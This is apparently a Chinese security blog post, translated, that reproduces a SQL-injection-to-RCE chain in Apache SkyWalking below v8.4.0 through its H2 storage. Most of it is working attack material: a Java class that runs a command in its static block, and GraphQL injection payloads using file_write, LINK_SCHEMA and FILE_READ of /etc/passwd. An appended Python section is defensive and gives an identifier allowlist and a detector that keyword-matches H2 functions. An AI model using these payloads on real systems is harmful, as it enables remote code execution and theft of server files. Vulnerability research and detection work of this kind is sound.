Apache SkyWalking RCE Reproduction

0x01. Root cause

SkyWalking has had two SQL injection vulnerabilities in the past, CVE-2020-9483 and CVE-2020-13921. This vulnerability (SkyWalking versions below v8.4.0) exists because the fixes for those two issues were incomplete and one SQL injection point remained. Combined with the H2 database (the default storage backend), it can be turned into RCE.

0x02. Reproduction

The reproduction flow used in this post is:
malicious Java code (e.g. exec(cmd) with String cmd = "command") -> packaged into a class -> the class file is converted to hex (H2's file_read() is used for this) -> the class file is POSTed to the server -> a read-file request is POSTed to retrieve the output, giving RCE with echoed results.

Static block of the malicious class

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.FileWriter;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;

// Class name matches the file_write()/LINK_SCHEMA payloads below.
// The static initializer runs as soon as H2 loads the class, so no method call is needed.
public class TouchFile {
    static {
        try {
            String cmd = "whoami";
            // run the command and collect its standard output
            InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
            InputStreamReader i = new InputStreamReader(in, "GBK");
            BufferedReader re = new BufferedReader(i);
            StringBuilder sb = new StringBuilder(1024);
            String line = null;
            while ((line = re.readLine()) != null) {
                sb.append(line);
            }

            // write the output to a file that is later retrieved with FILE_READ()
            BufferedWriter out = new BufferedWriter(new FileWriter("output.txt"));
            out.write(String.valueOf(sb));
            out.close();
        } catch (IOException var7) {
        }
    }
}

H2 file_read()


Uploading the class


{
"query": "query queryLogs($condition: LogQueryCondition) {
logs: queryLogs(condition: $condition) {
data: logs {
serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content
}
total
}
}",
"variables": {
"condition": {
"metricName": "INFORMATION_SCHEMA.USERS union all select file_write('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','TouchFile.class'))a where 1=? or 1=? or 1=? --",
"endpointId":"1",
"traceId":"1",
"state":"ALL",
"stateCode":"1",
"paging":{
"pageNum": 1,
"pageSize": 1,
"needTotal": true
}
}
}
}


{
"query": "query queryLogs($condition: LogQueryCondition) {
logs: queryLogs(condition: $condition) {
data: logs {
serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content
}
total
}
}",
"variables": {
"condition": {
"metricName": "INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','TouchFile','jdbc:h2:./test2','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --",
"endpointId":"1",
"traceId":"1",
"state":"ALL",
"stateCode":"1",
"paging":{
"pageNum": 1,
"pageSize": 1,
"needTotal": true
}
}
}
}

Reading the file


{
"query": "query queryLogs($condition: LogQueryCondition) {\n    queryLogs(condition: $condition) {\n        logs{\n    content    }\n  }}",
"variables": {
"condition": {
"metricName": "INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1--",
"paging": {"pageNum": 1, "pageSize": 1},
"state": "ALL",
"queryDuration": {"start": "2021-02-07 1554", "end": "2021-02-07 1554", "step": "MINUTE"}
}
}
}
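The requests above all ride on the same weak point: the metricName value is spliced into the SQL text that the log query builds. As an added example (not code from the original post or from the SkyWalking project), the Python below contrasts that splicing with an allowlist that accepts only a bare identifier, and adds a small classifier a defender can run over request bodies to flag the H2 file/link functions seen in this post. The request bodies, regular expressions and function names are constructed for this illustration.

```python
import json
import re
from typing import Optional

# Constructed sample GraphQL request bodies (not captured traffic). The
# second one follows the injection pattern shown in this post.
_QUERY = ("query queryLogs($condition: LogQueryCondition) "
          "{ queryLogs(condition: $condition) { logs { content } } }")
BENIGN_BODY = json.dumps({
    "query": _QUERY,
    "variables": {"condition": {"metricName": "service_cpm",
                                "paging": {"pageNum": 1, "pageSize": 1},
                                "state": "ALL"}},
})
INJECTED_BODY = json.dumps({
    "query": _QUERY,
    "variables": {"condition": {
        "metricName": "INFORMATION_SCHEMA.USERS) union SELECT FILE_READ('/etc/passwd', NULL) where ?=1 or ?=1 or 1=1--",
        "paging": {"pageNum": 1, "pageSize": 1},
        "state": "ALL"}},
})

# Allowlist: a metric (table) name is a plain SQL identifier, nothing else.
METRIC_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
# H2 built-ins that touch the file system or load classes, used here only to
# tag suspicious requests for detection.
H2_FUNCTIONS = re.compile(r"\b(FILE_WRITE|FILE_READ|LINK_SCHEMA|CSVREAD|CSVWRITE)\s*\(", re.I)
# Generic SQL-syntax markers that never belong in a metric name.
SQL_MARKERS = re.compile(r"\bunion\b|--|/\*|'", re.I)


def build_log_query_unsafe(metric_name: str) -> str:
    """Mirror of the weak pattern: the name is concatenated into the SQL text."""
    return f"select * from {metric_name} where 1=? or 1=? or 1=?"


def build_log_query_safe(metric_name: str) -> str:
    """Hardened form: an identifier cannot be bound as a parameter, so it is
    validated against the allowlist before it is placed in the statement."""
    if not METRIC_NAME.fullmatch(metric_name):
        raise ValueError(f"rejected metricName: {metric_name!r}")
    return f"select * from {metric_name} where 1=? or 1=? or 1=?"


def extract_metric_name(body: str) -> Optional[str]:
    """Pull variables.condition.metricName out of a GraphQL request body."""
    try:
        doc = json.loads(body)
        return doc["variables"]["condition"].get("metricName")
    except (ValueError, KeyError, TypeError, AttributeError):
        return None


def classify_request(body: str) -> dict:
    """Classify one request body for a detection rule or log review."""
    name = extract_metric_name(body)
    indicators = []
    if name is not None:
        indicators += [m.group(1).upper() for m in H2_FUNCTIONS.finditer(name)]
        if SQL_MARKERS.search(name):
            indicators.append("SQL_SYNTAX")
    return {
        "metric_name": name,
        "valid": name is not None and METRIC_NAME.fullmatch(name) is not None,
        "indicators": indicators,
    }


if __name__ == "__main__":
    for body in (BENIGN_BODY, INJECTED_BODY):
        print(classify_request(body))
```

The allowlist is the durable fix: a table name can never be a bound parameter, so the only safe option is to refuse anything that is not a known identifier. The classifier is a complement for the SOC, not a replacement for the fix; it catches the H2 functions named in this post but a keyword list can always be evaded.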

0x03.

The written .class file is destroyed after it has executed once, so the command to run must be written into the class and executed via 'select LINK_SCHEMA'. Therefore a shell probably cannot be written directly, but a class implementing a reverse shell could be uploaded. I have not studied Java and do not know how to write that class; I will try it when I get a chance.
